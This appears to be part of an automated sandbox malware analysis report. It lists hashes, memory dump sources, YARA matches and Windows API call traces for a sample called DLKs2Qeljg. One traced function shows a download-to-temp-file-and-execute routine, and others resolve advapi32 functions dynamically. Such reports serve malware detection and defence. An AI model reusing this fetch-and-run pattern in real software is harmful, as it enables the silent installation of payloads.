                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction Fuzzy Hash: E411E77B2C004343D659CA2DDCB46BBA796EBC5229B2F837AD1494B758DF32A145E600
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149087882.0000000000589000.00000040.00000020.00020000.00000000.sdmp, Offset: 00589000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_589000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                        • Instruction ID: af20dd815f093ee1cbe2e05c29ff04ca3c2633d62e702633122d2164681b0e47
                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                        • Instruction Fuzzy Hash: 29118E72341101AFD744EF59DC81EA677EAFB89320B2D80A5ED08DB352E676EC42C764
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                        • Instruction ID: 6a7ae1ff5e9c438eb39d1739dd139b69842fd91671cf499703bb93b43dee2957
                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                        • Instruction Fuzzy Hash: 3C012B766516148FDF21CF20C804BAA33F5FB99205F1541B4E506D7341E370A845CB80
                                                                                                        APIs
                                                                                                        • DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
                                                                                                        • GetClientRect.USER32(?,?), ref: 00402140
                                                                                                        • GetDC.USER32(?), ref: 00402147
                                                                                                        • CreateSolidBrush.GDI32(00646464), ref: 0040215A
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0040216E
                                                                                                        • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00402187
                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
                                                                                                        • MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004021E0
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040225D
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0040226C
                                                                                                        • _wcslen.LIBCMT ref: 00402275
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                        • String ID: Tahoma
                                                                                                        • API String ID: 3832963559-3580928618
                                                                                                        • Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                        • Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
                                                                                                        • Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                        • Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(?), ref: 004025C3
                                                                                                        • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
                                                                                                        • ReleaseCapture.USER32 ref: 004025E8
                                                                                                        • GetDC.USER32(00000000), ref: 0040260F
                                                                                                        • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0040269F
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004026A9
                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004026E0
                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
                                                                                                        • GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402727
                                                                                                        • DeleteDC.GDI32(00000000), ref: 0040272E
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00402735
                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00402743
                                                                                                        • DestroyWindow.USER32(?), ref: 0040274A
                                                                                                        • SetCapture.USER32(?), ref: 00402797
                                                                                                        • GetDC.USER32(00000000), ref: 004027CB
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004027E1
                                                                                                        • GetKeyState.USER32(0000001B), ref: 004027EE
                                                                                                        • DestroyWindow.USER32(?), ref: 00402803
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                        • String ID: hef
                                                                                                        • API String ID: 2545303185-98441221
                                                                                                        • Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                        • Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
                                                                                                        • Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                        • Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 2509303402-0
                                                                                                        • Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                        • Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
                                                                                                        • Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                        • Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 2509303402-0
                                                                                                        • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                        • Instruction ID: 4885b96f6dc656a4b327cd0a6940776b112667695d49171b6b2d3a929230682c
                                                                                                        • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                        • Instruction Fuzzy Hash: 24B18D71D802199FDB21DF68C880BEEBBF5BF08304F1445ADE8A9A7251DB75A941CF60
                                                                                                        APIs
                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0043A62C
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
                                                                                                          • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70
                                                                                                        • _free.LIBCMT ref: 0043A621
                                                                                                          • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                          • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                        • _free.LIBCMT ref: 0043A643
                                                                                                        • _free.LIBCMT ref: 0043A658
                                                                                                        • _free.LIBCMT ref: 0043A663
                                                                                                        • _free.LIBCMT ref: 0043A685
                                                                                                        • _free.LIBCMT ref: 0043A698
                                                                                                        • _free.LIBCMT ref: 0043A6A6
                                                                                                        • _free.LIBCMT ref: 0043A6B1
                                                                                                        • _free.LIBCMT ref: 0043A6E9
                                                                                                        • _free.LIBCMT ref: 0043A6F0
                                                                                                        • _free.LIBCMT ref: 0043A70D
                                                                                                        • _free.LIBCMT ref: 0043A725
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID:
                                                                                                        • API String ID: 161543041-0
                                                                                                        • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                        • Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
                                                                                                        • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                        • Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19
                                                                                                        APIs
                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0215A893
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159BFF
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159C11
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159C23
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159C35
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159C47
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159C59
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159C6B
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159C7D
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159C8F
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159CA1
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159CB3
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159CC5
                                                                                                          • Part of subcall function 02159BE2: _free.LIBCMT ref: 02159CD7
                                                                                                        • _free.LIBCMT ref: 0215A888
                                                                                                          • Part of subcall function 021536C1: HeapFree.KERNEL32(00000000,00000000,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?), ref: 021536D7
                                                                                                          • Part of subcall function 021536C1: GetLastError.KERNEL32(?,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?,?), ref: 021536E9
                                                                                                        • _free.LIBCMT ref: 0215A8AA
                                                                                                        • _free.LIBCMT ref: 0215A8BF
                                                                                                        • _free.LIBCMT ref: 0215A8CA
                                                                                                        • _free.LIBCMT ref: 0215A8EC
                                                                                                        • _free.LIBCMT ref: 0215A8FF
                                                                                                        • _free.LIBCMT ref: 0215A90D
                                                                                                        • _free.LIBCMT ref: 0215A918
                                                                                                        • _free.LIBCMT ref: 0215A950
                                                                                                        • _free.LIBCMT ref: 0215A957
                                                                                                        • _free.LIBCMT ref: 0215A974
                                                                                                        • _free.LIBCMT ref: 0215A98C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID:
                                                                                                        • API String ID: 161543041-0
                                                                                                        • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                        • Instruction ID: d4cf024973943eefdddcd1e13f1baf08789bede659a47ed65d078828023dc159
                                                                                                        • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                        • Instruction Fuzzy Hash: A5316F31AC0229DFEB21AF38E844B5677E9AF00351F1046EDEC79D7260DB35A951CBA4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                        • Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
                                                                                                        • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                        • Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54
                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02122C74
                                                                                                        • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 02122C8A
                                                                                                        • GetTempPathW.KERNEL32(00000105,?), ref: 02122CA6
                                                                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02122CBC
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02122CF5
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02122D31
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02122D4E
                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 02122DC5
                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 02122DDA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                        • String ID: <
                                                                                                        • API String ID: 838076374-4251816714
                                                                                                        • Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                        • Instruction ID: 97c1044520fec8091de8ef22eb2ffe19914b1a61732b27e4a74d5941222e50fe
                                                                                                        • Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                        • Instruction Fuzzy Hash: E7414F7194022DAFEB209F609C85FEAB7BCFF05705F0080A6B549E2150DF709E898FA4
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0213F218,00000004,02137D77,00000004,02138059), ref: 0213EEE9
                                                                                                        • GetLastError.KERNEL32(?,0213F218,00000004,02137D77,00000004,02138059,?,02138789,?,00000008,02137FFD,00000000,?,?,00000000,?), ref: 0213EEF5
                                                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,?,0213F218,00000004,02137D77,00000004,02138059,?,02138789,?,00000008,02137FFD,00000000,?,?,00000000), ref: 0213EF05
                                                                                                        • GetProcAddress.KERNEL32(00000000,00447430), ref: 0213EF1B
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF31
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF48
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF5F
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF76
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF8D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                        • String ID: advapi32.dll
                                                                                                        • API String ID: 2340687224-4050573280
                                                                                                        • Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                        • Instruction ID: b0c98306edb8a4a5bf0c15a60bb52d4c3930032231351d9b92b9465c54ec2dc6
                                                                                                        • Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                        • Instruction Fuzzy Hash: 70216BB1944750BFEB117FB49C08A5ABFADEF05B16F104A2AF541E3611CB7C88408BA8
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0213F218,00000004,02137D77,00000004,02138059), ref: 0213EEE9
                                                                                                        • GetLastError.KERNEL32(?,0213F218,00000004,02137D77,00000004,02138059,?,02138789,?,00000008,02137FFD,00000000,?,?,00000000,?), ref: 0213EEF5
                                                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,?,0213F218,00000004,02137D77,00000004,02138059,?,02138789,?,00000008,02137FFD,00000000,?,?,00000000), ref: 0213EF05
                                                                                                        • GetProcAddress.KERNEL32(00000000,00447430), ref: 0213EF1B
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF31
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF48
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF5F
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF76
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF8D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                        • String ID: advapi32.dll
                                                                                                        • API String ID: 2340687224-4050573280
                                                                                                        • Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                        • Instruction ID: 20cb81afc6292843573dc56cccbfacbed6253380f4ae32796dae8dabb8b5128c
                                                                                                        • Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                        • Instruction Fuzzy Hash: 2C218EB1944750BFEB117FA49C08B5ABFADEF05B16F004A2AF541E3611CB7CD4408BA8
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021366FB), ref: 021324A6
                                                                                                        • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021324B4
                                                                                                        • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021324C2
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021366FB), ref: 021324F0
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 021324F7
                                                                                                        • GetLastError.KERNEL32(?,?,?,021366FB), ref: 02132512
                                                                                                        • GetLastError.KERNEL32(?,?,?,021366FB), ref: 0213251E
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132534
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132542
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                        • String ID: kernel32.dll
                                                                                                        • API String ID: 4179531150-1793498882
                                                                                                        • Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                        • Instruction ID: c35ed88de1fecfa92928103d734d19466406df1c8194e7eb0db605be244136c8
                                                                                                        • Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                        • Instruction Fuzzy Hash: 2011A5769403107FE7127B756C59AAB3BAEAE01B137200536FC01E3251EF78DA008AAC
                                                                                                        APIs
                                                                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856
                                                                                                          • Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35
                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00424888
                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042494C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                        • String ID: pContext$switchState
                                                                                                        • API String ID: 3151764488-2660820399
                                                                                                        • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                        • Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
                                                                                                        • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                        • Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
                                                                                                        • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
                                                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 00419769
                                                                                                        • SafeRWList.LIBCONCRT ref: 00419788
                                                                                                          • Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
                                                                                                          • Part of subcall function 00417757: List.LIBCMT ref: 00417772
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
                                                                                                        • GetLastError.KERNEL32 ref: 004197A9
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004197CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                        • String ID: eventObject
                                                                                                        • API String ID: 1999291547-1680012138
                                                                                                        • Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                        • Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
                                                                                                        • Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                        • Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D
                                                                                                        APIs
                                                                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415239
                                                                                                          • Part of subcall function 00414C4A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C5E
                                                                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415262
                                                                                                          • Part of subcall function 004130C4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004130E0
                                                                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415289
                                                                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415143
                                                                                                          • Part of subcall function 00413128: __EH_prolog3_GS.LIBCMT ref: 0041312F
                                                                                                          • Part of subcall function 00413128: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041313E
                                                                                                          • Part of subcall function 00413128: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413145
                                                                                                          • Part of subcall function 00413128: GetCurrentThread.KERNEL32 ref: 0041316D
                                                                                                          • Part of subcall function 00413128: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413177
                                                                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415164
                                                                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0041519B
                                                                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151DE
                                                                                                        • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152D1
